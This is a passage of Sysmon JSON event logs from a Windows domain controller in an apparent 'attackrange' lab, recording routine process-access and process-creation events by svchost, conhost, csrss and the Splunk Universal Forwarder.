06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3866,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3867,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3868,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00109DA70500}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00109DA70500}","TargetProcessId":"4968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3869,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.747\r\nSourceProcessGUID: {E2A3D6B1-1106-5F25-0000-00109DA70500}\r\nSourceProcessId: 4968\r\nSourceThreadId: 4972\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.747","SourceProcessGUID":"{E2A3D6B1-1106-5F25-0000-00109DA70500}","SourceProcessId":"4968","SourceThreadId":"4972","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3870,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.775\r\nProcessGuid: {E2A3D6B1-1106-5F25-0000-00106CAA0500}\r\nProcessId: 4984\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.775","ProcessGuid":"{E2A3D6B1-1106-5F25-0000-00106CAA0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3871,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00106CAA0500}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00106CAA0500}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3872,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00106CAA0500}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00106CAA0500}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3873,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3874,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
